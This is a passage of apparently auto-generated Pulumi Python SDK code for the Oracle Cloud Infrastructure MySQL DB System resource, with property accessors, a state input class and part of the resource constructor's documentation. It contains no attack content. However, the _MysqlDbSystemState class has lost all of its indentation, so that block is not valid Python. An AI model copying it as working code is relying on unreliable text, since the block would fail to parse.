    def maintenance(self, value: Optional[pulumi.Input['MysqlDbSystemMaintenanceArgs']]):
        pulumi.set(self, "maintenance", value)

    @property
    @pulumi.getter(name="mysqlVersion")
    def mysql_version(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the MySQL Version in use for the DB System.
        """
        return pulumi.get(self, "mysql_version")

    @mysql_version.setter
    def mysql_version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "mysql_version", value)

    @property
    @pulumi.getter
    def port(self) -> Optional[pulumi.Input[int]]:
        """
        The port for primary endpoint of the DB System to listen on.
        """
        return pulumi.get(self, "port")

    @port.setter
    def port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port", value)

    @property
    @pulumi.getter(name="portX")
    def port_x(self) -> Optional[pulumi.Input[int]]:
        """
        The TCP network port on which X Plugin listens for connections. This is the X Plugin equivalent of port.
        """
        return pulumi.get(self, "port_x")

    @port_x.setter
    def port_x(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port_x", value)

    @property
    @pulumi.getter(name="shutdownType")
    def shutdown_type(self) -> Optional[pulumi.Input[str]]:
        """
        It is applicable only for stopping a DB System. Could be set to `FAST`, `SLOW` or `IMMEDIATE`. Default value is `FAST`.
        """
        return pulumi.get(self, "shutdown_type")

    @shutdown_type.setter
    def shutdown_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "shutdown_type", value)

    @property
    @pulumi.getter
    def source(self) -> Optional[pulumi.Input['MysqlDbSystemSourceArgs']]:
        """
        Parameters detailing how to provision the initial data of the system.
        """
        return pulumi.get(self, "source")

    @source.setter
    def source(self, value: Optional[pulumi.Input['MysqlDbSystemSourceArgs']]):
        pulumi.set(self, "source", value)

    @property
    @pulumi.getter
    def state(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) The target state for the DB System. Could be set to `ACTIVE` or `INACTIVE`.
        """
        return pulumi.get(self, "state")

    @state.setter
    def state(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "state", value)
@pulumi.input_type
class _MysqlDbSystemState:
def __init__(__self__, *,
admin_password: Optional[pulumi.Input[str]] = None,
admin_username: Optional[pulumi.Input[str]] = None,
analytics_cluster: Optional[pulumi.Input['MysqlDbSystemAnalyticsClusterArgs']] = None,
availability_domain: Optional[pulumi.Input[str]] = None,
backup_policy: Optional[pulumi.Input['MysqlDbSystemBackupPolicyArgs']] = None,
channels: Optional[pulumi.Input[Sequence[pulumi.Input['MysqlDbSystemChannelArgs']]]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
configuration_id: Optional[pulumi.Input[str]] = None,
current_placement: Optional[pulumi.Input['MysqlDbSystemCurrentPlacementArgs']] = None,
data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
endpoints: Optional[pulumi.Input[Sequence[pulumi.Input['MysqlDbSystemEndpointArgs']]]] = None,
fault_domain: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
heat_wave_cluster: Optional[pulumi.Input['MysqlDbSystemHeatWaveClusterArgs']] = None,
hostname_label: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
is_analytics_cluster_attached: Optional[pulumi.Input[bool]] = None,
is_heat_wave_cluster_attached: Optional[pulumi.Input[bool]] = None,
is_highly_available: Optional[pulumi.Input[bool]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
maintenance: Optional[pulumi.Input['MysqlDbSystemMaintenanceArgs']] = None,
mysql_version: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
port_x: Optional[pulumi.Input[int]] = None,
shape_name: Optional[pulumi.Input[str]] = None,
shutdown_type: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input['MysqlDbSystemSourceArgs']] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering MysqlDbSystem resources.
:param pulumi.Input[str] admin_password: The password for the administrative user. The password must be between 8 and 32 characters long, and must contain at least 1 numeric character, 1 lowercase character, 1 uppercase character, and 1 special (nonalphanumeric) character.
:param pulumi.Input[str] admin_username: The username for the administrative user.
:param pulumi.Input['MysqlDbSystemAnalyticsClusterArgs'] analytics_cluster: DEPRECATED -- please use HeatWave API instead. A summary of an Analytics Cluster.
:param pulumi.Input[str] availability_domain: The availability domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
:param pulumi.Input['MysqlDbSystemBackupPolicyArgs'] backup_policy: (Updatable) Backup policy as optionally used for DB System Creation.
:param pulumi.Input[Sequence[pulumi.Input['MysqlDbSystemChannelArgs']]] channels: A list with a summary of all the Channels attached to the DB System.
:param pulumi.Input[str] compartment_id: The OCID of the compartment.
:param pulumi.Input[str] configuration_id: The OCID of the Configuration to be used for this DB System.
:param pulumi.Input['MysqlDbSystemCurrentPlacementArgs'] current_placement: The availability domain and fault domain a DB System is placed in.
:param pulumi.Input[int] data_storage_size_in_gb: Initial size of the data volume in GBs that will be created and attached. Keep in mind that this only specifies the size of the database data volume, the log volume for the database will be scaled appropriately with its shape. It is required if you are creating a new database. It cannot be set if you are creating a database from a backup.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Usage of predefined tag keys. These predefined keys are scoped to namespaces. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] description: (Updatable) User-provided data about the DB System.
:param pulumi.Input[str] display_name: (Updatable) The user-friendly name for the DB System. It does not have to be unique.
:param pulumi.Input[Sequence[pulumi.Input['MysqlDbSystemEndpointArgs']]] endpoints: The network endpoints available for this DB System.
:param pulumi.Input[str] fault_domain: The fault domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input['MysqlDbSystemHeatWaveClusterArgs'] heat_wave_cluster: A summary of a HeatWave cluster.
:param pulumi.Input[str] hostname_label: The hostname for the primary endpoint of the DB System. Used for DNS.
:param pulumi.Input[str] ip_address: The IP address the DB System is configured to listen on. A private IP address of your choice to assign to the primary endpoint of the DB System. Must be an available IP address within the subnet's CIDR. If you don't specify a value, Oracle automatically assigns a private IP address from the subnet. This should be a "dotted-quad" style IPv4 address.
:param pulumi.Input[bool] is_analytics_cluster_attached: DEPRECATED -- please use `isHeatWaveClusterAttached` instead. If the DB System has an Analytics Cluster attached.
:param pulumi.Input[bool] is_heat_wave_cluster_attached: If the DB System has a HeatWave Cluster attached.
:param pulumi.Input[bool] is_highly_available: (Updatable) Specifies if the DB System is highly available.
:param pulumi.Input[str] lifecycle_details: Additional information about the current lifecycleState.
:param pulumi.Input['MysqlDbSystemMaintenanceArgs'] maintenance: (Updatable) The Maintenance Policy for the DB System. `maintenance` and `backup_policy` cannot be updated in the same request.
:param pulumi.Input[str] mysql_version: Name of the MySQL Version in use for the DB System.
:param pulumi.Input[int] port: The port for primary endpoint of the DB System to listen on.
:param pulumi.Input[int] port_x: The TCP network port on which X Plugin listens for connections. This is the X Plugin equivalent of port.
:param pulumi.Input[str] shape_name: The name of the shape. The shape determines the resources allocated
* CPU cores and memory for VM shapes; CPU cores, memory and storage for non-VM (or bare metal) shapes. To get a list of shapes, use the [ListShapes](https://docs.cloud.oracle.com/iaas/api/#/en/mysql/20190415/ShapeSummary/ListShapes) operation.
:param pulumi.Input[str] shutdown_type: It is applicable only for stopping a DB System. Could be set to `FAST`, `SLOW` or `IMMEDIATE`. Default value is `FAST`.
:param pulumi.Input['MysqlDbSystemSourceArgs'] source: Parameters detailing how to provision the initial data of the system.
:param pulumi.Input[str] state: (Updatable) The target state for the DB System. Could be set to `ACTIVE` or `INACTIVE`.
:param pulumi.Input[str] subnet_id: The OCID of the subnet the DB System is associated with.
:param pulumi.Input[str] time_created: The date and time the DB System was created.
:param pulumi.Input[str] time_updated: The time the DB System was last updated.
"""
if admin_password is not None:
pulumi.set(__self__, "admin_password", admin_password)
if admin_username is not None:
pulumi.set(__self__, "admin_username", admin_username)
if analytics_cluster is not None:
pulumi.set(__self__, "analytics_cluster", analytics_cluster)
if availability_domain is not None:
pulumi.set(__self__, "availability_domain", availability_domain)
if backup_policy is not None:
pulumi.set(__self__, "backup_policy", backup_policy)
if channels is not None:
pulumi.set(__self__, "channels", channels)
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if configuration_id is not None:
pulumi.set(__self__, "configuration_id", configuration_id)
if current_placement is not None:
pulumi.set(__self__, "current_placement", current_placement)
if data_storage_size_in_gb is not None:
pulumi.set(__self__, "data_storage_size_in_gb", data_storage_size_in_gb)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if endpoints is not None:
pulumi.set(__self__, "endpoints", endpoints)
if fault_domain is not None:
pulumi.set(__self__, "fault_domain", fault_domain)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if heat_wave_cluster is not None:
pulumi.set(__self__, "heat_wave_cluster", heat_wave_cluster)
if hostname_label is not None:
pulumi.set(__self__, "hostname_label", hostname_label)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if is_analytics_cluster_attached is not None:
pulumi.set(__self__, "is_analytics_cluster_attached", is_analytics_cluster_attached)
if is_heat_wave_cluster_attached is not None:
pulumi.set(__self__, "is_heat_wave_cluster_attached", is_heat_wave_cluster_attached)
if is_highly_available is not None:
pulumi.set(__self__, "is_highly_available", is_highly_available)
if lifecycle_details is not None:
pulumi.set(__self__, "lifecycle_details", lifecycle_details)
if maintenance is not None:
pulumi.set(__self__, "maintenance", maintenance)
if mysql_version is not None:
warnings.warn("""The 'mysql_version' field has been deprecated and may be removed in a future version. Do not use this field.""", DeprecationWarning)
pulumi.log.warn("""mysql_version is deprecated: The 'mysql_version' field has been deprecated and may be removed in a future version. Do not use this field.""")
if mysql_version is not None:
pulumi.set(__self__, "mysql_version", mysql_version)
if port is not None:
pulumi.set(__self__, "port", port)
if port_x is not None:
pulumi.set(__self__, "port_x", port_x)
if shape_name is not None:
pulumi.set(__self__, "shape_name", shape_name)
if shutdown_type is not None:
pulumi.set(__self__, "shutdown_type", shutdown_type)
if source is not None:
pulumi.set(__self__, "source", source)
if state is not None:
pulumi.set(__self__, "state", state)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
if time_updated is not None:
pulumi.set(__self__, "time_updated", time_updated)
    # --- Generated Pulumi property accessors --------------------------------
    # Each @property below reads its value from the resource's internal
    # property bag via pulumi.get, and each matching setter writes it back
    # via pulumi.set; the accessors contain no other logic.
    @property
    @pulumi.getter(name="adminPassword")
    def admin_password(self) -> Optional[pulumi.Input[str]]:
        """
        The password for the administrative user. The password must be between 8 and 32 characters long, and must contain at least 1 numeric character, 1 lowercase character, 1 uppercase character, and 1 special (nonalphanumeric) character.
        """
        return pulumi.get(self, "admin_password")

    @admin_password.setter
    def admin_password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "admin_password", value)

    @property
    @pulumi.getter(name="adminUsername")
    def admin_username(self) -> Optional[pulumi.Input[str]]:
        """
        The username for the administrative user.
        """
        return pulumi.get(self, "admin_username")

    @admin_username.setter
    def admin_username(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "admin_username", value)

    @property
    @pulumi.getter(name="analyticsCluster")
    def analytics_cluster(self) -> Optional[pulumi.Input['MysqlDbSystemAnalyticsClusterArgs']]:
        """
        DEPRECATED -- please use HeatWave API instead. A summary of an Analytics Cluster.
        """
        return pulumi.get(self, "analytics_cluster")

    @analytics_cluster.setter
    def analytics_cluster(self, value: Optional[pulumi.Input['MysqlDbSystemAnalyticsClusterArgs']]):
        pulumi.set(self, "analytics_cluster", value)

    @property
    @pulumi.getter(name="availabilityDomain")
    def availability_domain(self) -> Optional[pulumi.Input[str]]:
        """
        The availability domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
        """
        return pulumi.get(self, "availability_domain")

    @availability_domain.setter
    def availability_domain(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "availability_domain", value)

    @property
    @pulumi.getter(name="backupPolicy")
    def backup_policy(self) -> Optional[pulumi.Input['MysqlDbSystemBackupPolicyArgs']]:
        """
        (Updatable) Backup policy as optionally used for DB System Creation.
        """
        return pulumi.get(self, "backup_policy")

    @backup_policy.setter
    def backup_policy(self, value: Optional[pulumi.Input['MysqlDbSystemBackupPolicyArgs']]):
        pulumi.set(self, "backup_policy", value)

    @property
    @pulumi.getter
    def channels(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MysqlDbSystemChannelArgs']]]]:
        """
        A list with a summary of all the Channels attached to the DB System.
        """
        return pulumi.get(self, "channels")

    @channels.setter
    def channels(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MysqlDbSystemChannelArgs']]]]):
        pulumi.set(self, "channels", value)

    @property
    @pulumi.getter(name="compartmentId")
    def compartment_id(self) -> Optional[pulumi.Input[str]]:
        """
        The OCID of the compartment.
        """
        return pulumi.get(self, "compartment_id")

    @compartment_id.setter
    def compartment_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "compartment_id", value)
    # Generated accessors: getters/setters that delegate to pulumi.get/pulumi.set.
    @property
    @pulumi.getter(name="configurationId")
    def configuration_id(self) -> Optional[pulumi.Input[str]]:
        """
        The OCID of the Configuration to be used for this DB System.
        """
        return pulumi.get(self, "configuration_id")

    @configuration_id.setter
    def configuration_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "configuration_id", value)

    @property
    @pulumi.getter(name="currentPlacement")
    def current_placement(self) -> Optional[pulumi.Input['MysqlDbSystemCurrentPlacementArgs']]:
        """
        The availability domain and fault domain a DB System is placed in.
        """
        return pulumi.get(self, "current_placement")

    @current_placement.setter
    def current_placement(self, value: Optional[pulumi.Input['MysqlDbSystemCurrentPlacementArgs']]):
        pulumi.set(self, "current_placement", value)

    @property
    @pulumi.getter(name="dataStorageSizeInGb")
    def data_storage_size_in_gb(self) -> Optional[pulumi.Input[int]]:
        """
        Initial size of the data volume in GBs that will be created and attached. Keep in mind that this only specifies the size of the database data volume, the log volume for the database will be scaled appropriately with its shape. It is required if you are creating a new database. It cannot be set if you are creating a database from a backup.
        """
        return pulumi.get(self, "data_storage_size_in_gb")

    @data_storage_size_in_gb.setter
    def data_storage_size_in_gb(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "data_storage_size_in_gb", value)

    @property
    @pulumi.getter(name="definedTags")
    def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        (Updatable) Usage of predefined tag keys. These predefined keys are scoped to namespaces. Example: `{"foo-namespace.bar-key": "value"}`
        """
        return pulumi.get(self, "defined_tags")

    @defined_tags.setter
    def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "defined_tags", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) User-provided data about the DB System.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) The user-friendly name for the DB System. It does not have to be unique.
        """
        return pulumi.get(self, "display_name")

    @display_name.setter
    def display_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "display_name", value)

    @property
    @pulumi.getter
    def endpoints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MysqlDbSystemEndpointArgs']]]]:
        """
        The network endpoints available for this DB System.
        """
        return pulumi.get(self, "endpoints")

    @endpoints.setter
    def endpoints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MysqlDbSystemEndpointArgs']]]]):
        pulumi.set(self, "endpoints", value)
    # Generated accessors: getters/setters that delegate to pulumi.get/pulumi.set.
    @property
    @pulumi.getter(name="faultDomain")
    def fault_domain(self) -> Optional[pulumi.Input[str]]:
        """
        The fault domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
        """
        return pulumi.get(self, "fault_domain")

    @fault_domain.setter
    def fault_domain(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "fault_domain", value)

    @property
    @pulumi.getter(name="freeformTags")
    def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        (Updatable) Simple key-value pair applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
        """
        return pulumi.get(self, "freeform_tags")

    @freeform_tags.setter
    def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "freeform_tags", value)

    @property
    @pulumi.getter(name="heatWaveCluster")
    def heat_wave_cluster(self) -> Optional[pulumi.Input['MysqlDbSystemHeatWaveClusterArgs']]:
        """
        A summary of a HeatWave cluster.
        """
        return pulumi.get(self, "heat_wave_cluster")

    @heat_wave_cluster.setter
    def heat_wave_cluster(self, value: Optional[pulumi.Input['MysqlDbSystemHeatWaveClusterArgs']]):
        pulumi.set(self, "heat_wave_cluster", value)

    @property
    @pulumi.getter(name="hostnameLabel")
    def hostname_label(self) -> Optional[pulumi.Input[str]]:
        """
        The hostname for the primary endpoint of the DB System. Used for DNS.
        """
        return pulumi.get(self, "hostname_label")

    @hostname_label.setter
    def hostname_label(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "hostname_label", value)

    @property
    @pulumi.getter(name="ipAddress")
    def ip_address(self) -> Optional[pulumi.Input[str]]:
        """
        The IP address the DB System is configured to listen on. A private IP address of your choice to assign to the primary endpoint of the DB System. Must be an available IP address within the subnet's CIDR. If you don't specify a value, Oracle automatically assigns a private IP address from the subnet. This should be a "dotted-quad" style IPv4 address.
        """
        return pulumi.get(self, "ip_address")

    @ip_address.setter
    def ip_address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ip_address", value)

    # Deprecated Analytics Cluster flag, kept for backward compatibility
    # alongside its HeatWave replacement below (see docstrings).
    @property
    @pulumi.getter(name="isAnalyticsClusterAttached")
    def is_analytics_cluster_attached(self) -> Optional[pulumi.Input[bool]]:
        """
        DEPRECATED -- please use `isHeatWaveClusterAttached` instead. If the DB System has an Analytics Cluster attached.
        """
        return pulumi.get(self, "is_analytics_cluster_attached")

    @is_analytics_cluster_attached.setter
    def is_analytics_cluster_attached(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_analytics_cluster_attached", value)

    @property
    @pulumi.getter(name="isHeatWaveClusterAttached")
    def is_heat_wave_cluster_attached(self) -> Optional[pulumi.Input[bool]]:
        """
        If the DB System has a HeatWave Cluster attached.
        """
        return pulumi.get(self, "is_heat_wave_cluster_attached")

    @is_heat_wave_cluster_attached.setter
    def is_heat_wave_cluster_attached(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_heat_wave_cluster_attached", value)
    # Generated accessors: getters/setters that delegate to pulumi.get/pulumi.set.
    @property
    @pulumi.getter(name="isHighlyAvailable")
    def is_highly_available(self) -> Optional[pulumi.Input[bool]]:
        """
        (Updatable) Specifies if the DB System is highly available.
        """
        return pulumi.get(self, "is_highly_available")

    @is_highly_available.setter
    def is_highly_available(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_highly_available", value)

    @property
    @pulumi.getter(name="lifecycleDetails")
    def lifecycle_details(self) -> Optional[pulumi.Input[str]]:
        """
        Additional information about the current lifecycleState.
        """
        return pulumi.get(self, "lifecycle_details")

    @lifecycle_details.setter
    def lifecycle_details(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "lifecycle_details", value)

    @property
    @pulumi.getter
    def maintenance(self) -> Optional[pulumi.Input['MysqlDbSystemMaintenanceArgs']]:
        """
        (Updatable) The Maintenance Policy for the DB System. `maintenance` and `backup_policy` cannot be updated in the same request.
        """
        return pulumi.get(self, "maintenance")

    @maintenance.setter
    def maintenance(self, value: Optional[pulumi.Input['MysqlDbSystemMaintenanceArgs']]):
        pulumi.set(self, "maintenance", value)

    # NOTE: mysql_version is a deprecated field -- setting it at resource
    # creation emits a DeprecationWarning (see the warnings.warn call in the
    # resource's constructor path).
    @property
    @pulumi.getter(name="mysqlVersion")
    def mysql_version(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the MySQL Version in use for the DB System.
        """
        return pulumi.get(self, "mysql_version")

    @mysql_version.setter
    def mysql_version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "mysql_version", value)

    @property
    @pulumi.getter
    def port(self) -> Optional[pulumi.Input[int]]:
        """
        The port for primary endpoint of the DB System to listen on.
        """
        return pulumi.get(self, "port")

    @port.setter
    def port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port", value)

    @property
    @pulumi.getter(name="portX")
    def port_x(self) -> Optional[pulumi.Input[int]]:
        """
        The TCP network port on which X Plugin listens for connections. This is the X Plugin equivalent of port.
        """
        return pulumi.get(self, "port_x")

    @port_x.setter
    def port_x(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port_x", value)
    # Generated accessors: getters/setters that delegate to pulumi.get/pulumi.set.
    @property
    @pulumi.getter(name="shapeName")
    def shape_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the shape. The shape determines the resources allocated
        * CPU cores and memory for VM shapes; CPU cores, memory and storage for non-VM (or bare metal) shapes. To get a list of shapes, use the [ListShapes](https://docs.cloud.oracle.com/iaas/api/#/en/mysql/20190415/ShapeSummary/ListShapes) operation.
        """
        return pulumi.get(self, "shape_name")

    @shape_name.setter
    def shape_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "shape_name", value)

    @property
    @pulumi.getter(name="shutdownType")
    def shutdown_type(self) -> Optional[pulumi.Input[str]]:
        """
        It is applicable only for stopping a DB System. Could be set to `FAST`, `SLOW` or `IMMEDIATE`. Default value is `FAST`.
        """
        return pulumi.get(self, "shutdown_type")

    @shutdown_type.setter
    def shutdown_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "shutdown_type", value)

    @property
    @pulumi.getter
    def source(self) -> Optional[pulumi.Input['MysqlDbSystemSourceArgs']]:
        """
        Parameters detailing how to provision the initial data of the system.
        """
        return pulumi.get(self, "source")

    @source.setter
    def source(self, value: Optional[pulumi.Input['MysqlDbSystemSourceArgs']]):
        pulumi.set(self, "source", value)

    @property
    @pulumi.getter
    def state(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) The target state for the DB System. Could be set to `ACTIVE` or `INACTIVE`.
        """
        return pulumi.get(self, "state")

    @state.setter
    def state(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "state", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        The OCID of the subnet the DB System is associated with.
        """
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="timeCreated")
    def time_created(self) -> Optional[pulumi.Input[str]]:
        """
        The date and time the DB System was created.
        """
        return pulumi.get(self, "time_created")

    @time_created.setter
    def time_created(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "time_created", value)

    @property
    @pulumi.getter(name="timeUpdated")
    def time_updated(self) -> Optional[pulumi.Input[str]]:
        """
        The time the DB System was last updated.
        """
        return pulumi.get(self, "time_updated")

    @time_updated.setter
    def time_updated(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "time_updated", value)
class MysqlDbSystem(pulumi.CustomResource):
    # Typing overload 1 of 2: construct the resource from individual keyword
    # arguments. The body is a stub (`...`); the real work happens in the
    # shared implementation method this class dispatches to.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 admin_password: Optional[pulumi.Input[str]] = None,
                 admin_username: Optional[pulumi.Input[str]] = None,
                 availability_domain: Optional[pulumi.Input[str]] = None,
                 backup_policy: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemBackupPolicyArgs']]] = None,
                 compartment_id: Optional[pulumi.Input[str]] = None,
                 configuration_id: Optional[pulumi.Input[str]] = None,
                 data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
                 defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 display_name: Optional[pulumi.Input[str]] = None,
                 fault_domain: Optional[pulumi.Input[str]] = None,
                 freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 hostname_label: Optional[pulumi.Input[str]] = None,
                 ip_address: Optional[pulumi.Input[str]] = None,
                 is_highly_available: Optional[pulumi.Input[bool]] = None,
                 maintenance: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemMaintenanceArgs']]] = None,
                 mysql_version: Optional[pulumi.Input[str]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 port_x: Optional[pulumi.Input[int]] = None,
                 shape_name: Optional[pulumi.Input[str]] = None,
                 shutdown_type: Optional[pulumi.Input[str]] = None,
                 source: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemSourceArgs']]] = None,
                 state: Optional[pulumi.Input[str]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        This resource provides the Mysql Db System resource in Oracle Cloud Infrastructure MySQL Database service.

        Creates and launches a DB System.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_oci as oci

        test_mysql_db_system = oci.mysql.MysqlDbSystem("testMysqlDbSystem",
            admin_password=var["mysql_db_system_admin_password"],
            admin_username=var["mysql_db_system_admin_username"],
            availability_domain=var["mysql_db_system_availability_domain"],
            compartment_id=var["compartment_id"],
            shape_name=var["mysql_shape_name"],
            subnet_id=oci_core_subnet["test_subnet"]["id"],
            backup_policy=oci.mysql.MysqlDbSystemBackupPolicyArgs(
                defined_tags={
                    "foo-namespace.bar-key": "value",
                },
                freeform_tags={
                    "bar-key": "value",
                },
                is_enabled=var["mysql_db_system_backup_policy_is_enabled"],
                retention_in_days=var["mysql_db_system_backup_policy_retention_in_days"],
                window_start_time=var["mysql_db_system_backup_policy_window_start_time"],
            ),
            configuration_id=oci_audit_configuration["test_configuration"]["id"],
            data_storage_size_in_gb=var["mysql_db_system_data_storage_size_in_gb"],
            defined_tags={
                "foo-namespace.bar-key": "value",
            },
            description=var["mysql_db_system_description"],
            display_name=var["mysql_db_system_display_name"],
            fault_domain=var["mysql_db_system_fault_domain"],
            freeform_tags={
                "bar-key": "value",
            },
            hostname_label=var["mysql_db_system_hostname_label"],
            ip_address=var["mysql_db_system_ip_address"],
            is_highly_available=var["mysql_db_system_is_highly_available"],
            maintenance=oci.mysql.MysqlDbSystemMaintenanceArgs(
                window_start_time=var["mysql_db_system_maintenance_window_start_time"],
            ),
            port=var["mysql_db_system_port"],
            port_x=var["mysql_db_system_port_x"],
            source=oci.mysql.MysqlDbSystemSourceArgs(
                source_type=var["mysql_db_system_source_source_type"],
                backup_id=oci_mysql_mysql_backup["test_backup"]["id"],
            ))
        ```

        ## Import

        MysqlDbSystems can be imported using the `id`, e.g.

        ```sh
         $ pulumi import oci:mysql/mysqlDbSystem:MysqlDbSystem test_mysql_db_system "id"
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] admin_password: The password for the administrative user. The password must be between 8 and 32 characters long, and must contain at least 1 numeric character, 1 lowercase character, 1 uppercase character, and 1 special (nonalphanumeric) character.
        :param pulumi.Input[str] admin_username: The username for the administrative user.
        :param pulumi.Input[str] availability_domain: The availability domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
        :param pulumi.Input[pulumi.InputType['MysqlDbSystemBackupPolicyArgs']] backup_policy: (Updatable) Backup policy as optionally used for DB System Creation.
        :param pulumi.Input[str] compartment_id: The OCID of the compartment.
        :param pulumi.Input[str] configuration_id: The OCID of the Configuration to be used for this DB System.
        :param pulumi.Input[int] data_storage_size_in_gb: Initial size of the data volume in GBs that will be created and attached. Keep in mind that this only specifies the size of the database data volume, the log volume for the database will be scaled appropriately with its shape. It is required if you are creating a new database. It cannot be set if you are creating a database from a backup.
        :param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Usage of predefined tag keys. These predefined keys are scoped to namespaces. Example: `{"foo-namespace.bar-key": "value"}`
        :param pulumi.Input[str] description: (Updatable) User-provided data about the DB System.
        :param pulumi.Input[str] display_name: (Updatable) The user-friendly name for the DB System. It does not have to be unique.
        :param pulumi.Input[str] fault_domain: The fault domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
        :param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
        :param pulumi.Input[str] hostname_label: The hostname for the primary endpoint of the DB System. Used for DNS.
        :param pulumi.Input[str] ip_address: The IP address the DB System is configured to listen on. A private IP address of your choice to assign to the primary endpoint of the DB System. Must be an available IP address within the subnet's CIDR. If you don't specify a value, Oracle automatically assigns a private IP address from the subnet. This should be a "dotted-quad" style IPv4 address.
        :param pulumi.Input[bool] is_highly_available: (Updatable) Specifies if the DB System is highly available.
